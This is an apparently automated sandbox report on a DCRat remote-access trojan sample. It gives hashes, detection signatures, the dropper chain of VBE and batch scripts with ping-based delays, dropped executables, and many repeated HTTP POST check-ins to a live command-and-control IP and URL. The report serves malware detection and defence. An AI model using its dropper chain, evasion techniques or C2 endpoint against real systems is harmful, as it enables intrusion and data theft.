Windows Analysis Report
o9jDrpZrgR.exe

Overview

General Information

Sample Name:o9jDrpZrgR.exe
Original Sample Name:c256204deb01c77e21ba17b5e2411245.exe
Analysis ID:1345582
MD5:c256204deb01c77e21ba17b5e2411245
SHA1:95ae7fb9f6710368e44a3c4e839d3d7bebbd4d5e
SHA256:f594822a45b8561a9b7a2e2ecf17558a692b1a193cf231617ba1b222723ca3ab
Tags:DCRat, exe

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Snort IDS alert for network traffic
Yara detected DCRat
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Machine Learning detection for sample
.NET source code contains potential unpacker
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
.NET source code contains very large strings
Machine Learning detection for dropped file
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
File is packed with WinRar
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Found WSH timer for Javascript or VBS script (likely evasive script)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Classification

  • System is w10x64
  • o9jDrpZrgR.exe (PID: 4308 cmdline: C:\Users\user\Desktop\o9jDrpZrgR.exe MD5: C256204DEB01C77E21BA17B5E2411245)
    • wscript.exe (PID: 5356 cmdline: "C:\Windows\System32\WScript.exe" "C:\reviewruntimeMonitor\oYwPDBVe3AuHG3t6JLon5FNZVJrzPzwK1qz3t5qd93gftXcSil5zO.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 2520 cmdline: C:\Windows\system32\cmd.exe /c ""C:\reviewruntimeMonitor\XfrEwTdqjpljDpai91jT4EKzapK.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • BlockrefBrokerperf.exe (PID: 5520 cmdline: C:\reviewruntimeMonitor/BlockrefBrokerperf.exe MD5: 295BF8D9B734730EFA567C8DA9918FE1)
          • cmd.exe (PID: 5000 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\XJsEcPfXWC.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 3664 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 2468 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
            • qBJICEqiLNwXNBLrN.exe (PID: 6604 cmdline: "C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe" MD5: 295BF8D9B734730EFA567C8DA9918FE1)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
o9jDrpZrgR.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
C:\reviewruntimeMonitor\BlockrefBrokerperf.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.2000894449.0000000004DA6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
0000000C.00000002.3242734675.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000003.2000527838.0000000006E2F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000005.00000000.2180051762.0000000000FC2000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000003.1999993579.0000000006524000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
0.3.o9jDrpZrgR.exe.657270c.0.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
5.0.BlockrefBrokerperf.exe.fc0000.0.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
0.3.o9jDrpZrgR.exe.6e7d70c.1.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

No Sigma rule has matched

Timestamp:11/21/23-04:47:24.543305
Source IP:192.168.2.5
Destination IP:77.91.124.101
SID:2048095
Source Port:49712
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

                                  AV Detection

Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\Desktop\KWPomPtF.log, Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe, Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\Desktop\BnwYCmoX.log, Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\HJnNqbKj.log, Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\AppData\Local\Temp\XJsEcPfXWC.bat, Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Users\user\Desktop\MTqwIPIz.log, Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\qtmQsFEO.log, Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\pwLIWFpU.log, Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: o9jDrpZrgR.exe, ReversingLabs: Detection: 65%
Source: o9jDrpZrgR.exe, Virustotal: Detection: 69%
Source: o9jDrpZrgR.exe, Avira: detected
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe, ReversingLabs: Detection: 79%
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe, Virustotal: Detection: 69%
Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, ReversingLabs: Detection: 79%
Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, Virustotal: Detection: 69%
Source: C:\Recovery\qBJICEqiLNwXNBLrN.exe, ReversingLabs: Detection: 79%
Source: C:\Recovery\qBJICEqiLNwXNBLrN.exe, Virustotal: Detection: 69%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\qBJICEqiLNwXNBLrN.exe, ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\qBJICEqiLNwXNBLrN.exe, Virustotal: Detection: 69%
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe, ReversingLabs: Detection: 79%
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe, Virustotal: Detection: 69%
Source: C:\Users\user\Desktop\BhRGcQzx.log, Virustotal: Detection: 8%
Source: C:\Users\user\Desktop\BnwYCmoX.log, Virustotal: Detection: 12%
Source: C:\Users\user\Desktop\GVjFENOl.log, Virustotal: Detection: 7%
Source: C:\Users\user\Desktop\GbOXfjDL.log, Virustotal: Detection: 7%
Source: C:\Users\user\Desktop\HJnNqbKj.log, ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\HJnNqbKj.log, Virustotal: Detection: 32%
Source: C:\Users\user\Desktop\KWPomPtF.log, ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\KWPomPtF.log, Virustotal: Detection: 32%
Source: C:\Users\user\Desktop\SoilvDeL.log, Virustotal: Detection: 8%
Source: o9jDrpZrgR.exe, Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\fNssmckm.log, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\jTkAEhsC.log, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\GbOXfjDL.log, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\GVjFENOl.log, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\lGVRPIpa.log, Joe Sandbox ML: detected
Source: o9jDrpZrgR.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe, Directory created: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe, Directory created: C:\Program Files\Microsoft Office 15\ClientX64\9bce06a9fec5b2
Source: o9jDrpZrgR.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: o9jDrpZrgR.exe
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe, File opened: C:\Users\user\Documents\desktop.ini
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe, File opened: C:\Users\user
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe, File opened: C:\Users\user\AppData\Local\Temp
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe, File opened: C:\Users\user\AppData
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe, File opened: C:\Users\user\AppData\Local
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe, File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe, Code function: 0_2_0088A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0088A69B
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe, Code function: 0_2_0089C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0089C220
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe, Code function: 0_2_008AB348 FindFirstFileExA,0_2_008AB348
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe, Code function: 4x nop then jmp 00007FF848F4C906h 5_2_00007FF848F4C6ED
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe, Code function: 4x nop then jmp 00007FF848F3C906h 12_2_00007FF848F3C6ED

                                  Networking

Source: Traffic, Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.5:49712 -> 77.91.124.101:80
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: global traffic, HTTP traffic detected:
    POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
    Host: 77.91.124.101
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 1396Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 1408Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 1408Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
